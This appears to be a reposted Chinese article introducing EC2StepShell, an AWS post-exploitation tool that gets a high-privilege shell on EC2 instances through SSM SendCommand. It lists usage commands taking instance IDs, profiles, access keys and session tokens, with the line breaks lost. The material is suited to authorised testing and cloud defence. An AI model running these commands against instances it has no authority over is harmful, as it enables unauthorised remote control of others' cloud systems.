EC2StepShell是一个AWS攻击后工具,用于获取公共或私有EC2实例中的高权限反向shell。它的工作原理是使用ssm:SendCommand向EC2实例发送命令,然后使用ssm:ListCommandInvocations检索输出。
安装:
python -m ec2stepshell -h
# running using the default profile configured in AWS CLIpython -m ec2stepshell $instance_id --region $region# running using a specific profile configured in AWS CLIpython -m ec2stepshell $instance_id --region $region --profile $profile# running using persistent access credentialspython -m ec2stepshell $instance_id --region $region --access-key $access_key --secret-key $secret_key# running using temporary access credentialspython -m ec2stepshell $instance_id --region $region --access-key $access_key --secret-key $secret_key --session-token $session_token
# for MacOS and UNIX instancespython -m ec2stepshell $instance_id --region $region --os linux# for Windows instancespython -m ec2stepshell $instance_id --region $region --os windows
# set an initial delay of 2.5 secondspython -m ec2stepshell $instance_id --region $region --delay 2.5
# set retry delay of 0.5 secondspython -m ec2stepshell $instance_id --region $region --retry-delay 0.5
# increase the maximum number of retries to 5python -m ec2stepshell $instance_id --region $region --max-retries 5
工具来源地址:https://github.com/saw-your-packet/EC2StepShell
文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247484363&idx=1&sn=3875b31a63fe525210acacca0f4c87ed&chksm=e9fb44ecde8ccdfadc5af77acfba6c82626eb8ffe487fbbb43efa1433f179c92003b0b7224b3#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh